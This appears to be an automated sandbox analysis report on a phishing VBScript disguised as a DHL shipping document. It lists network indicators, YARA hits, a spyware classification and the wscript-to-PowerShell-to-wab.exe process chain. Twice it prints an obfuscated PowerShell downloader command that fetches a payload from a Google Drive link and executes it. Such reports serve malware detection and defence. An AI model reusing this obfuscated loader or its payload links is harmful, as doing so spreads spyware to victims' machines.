Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: powershell.exe, 00000001.00000002.2329475776.000001D971C7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mUy
Source: powershell.exe, 00000004.00000002.2122178024.0000000008510000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000001.00000002.2198052956.000001D959B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.cash4cars.nz
Source: powershell.exe, 00000001.00000002.2313093176.000001D96966F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2108163000.0000000004D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wab.exe, 00000009.00000002.2941957130.0000000024531000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0R
Source: wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000001.00000002.2198052956.000001D959601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2108163000.0000000004C21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.0000000022401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2108163000.0000000004D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe, 00000009.00000002.2941957130.0000000024531000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: wab.exe, 00000009.00000002.2941957130.0000000024531000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: powershell.exe, 00000001.00000002.2198052956.000001D959601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2108163000.0000000004C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBkq
Source: wab.exe, 00000009.00000002.2940602617.0000000022401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: wab.exe, 00000009.00000002.2940602617.0000000022401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: wab.exe, 00000009.00000002.2940602617.0000000022401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B800000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: wab.exe, 00000009.00000002.2928711448.0000000006AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: wab.exe, 00000009.00000002.2928711448.0000000006B01000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2928670685.0000000006A30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g
Source: powershell.exe, 00000001.00000002.2198052956.000001D959829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9P
Source: powershell.exe, 00000004.00000002.2108163000.0000000004D78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9XR
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 00000009.00000003.2105897287.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2089818579.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2928711448.0000000006B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: wab.exe, 00000009.00000003.2105897287.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2089818579.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2106027892.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=download
Source: wab.exe, 00000009.00000002.2928711448.0000000006B01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=downloadQ
Source: wab.exe, 00000009.00000002.2928711448.0000000006B01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=downloadU
Source: wab.exe, 00000009.00000003.2105897287.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2089818579.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=downloade1
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9&export=download
Source: powershell.exe, 00000004.00000002.2108163000.0000000004D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2198052956.000001D95A17A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2313093176.000001D96966F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49740 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_6692.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_5932.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6692, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5932, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7520
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7520
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7520	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7520	Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega			Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8ACED6	1_2_00007FFD9B8ACED6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8ADC82	1_2_00007FFD9B8ADC82
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_084F1010	4_2_084F1010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_084F18E0	4_2_084F18E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_084F0CC8	4_2_084F0CC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_22244A98	9_2_22244A98
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2224A970	9_2_2224A970
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_22243E80	9_2_22243E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_222441C8	9_2_222441C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_2224F86F	9_2_2224F86F

Java / VBScript file with very long strings (likely obfuscated code)

Source: DHL Shipping doc.vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: amsi64_6692.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_5932.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6692, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5932, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@12/7@5/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Aptychus.Whi

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ireixikg.yh2.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6692
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5932
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DHL Shipping doc.vbs

Virustotal: Detection: 14%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs"
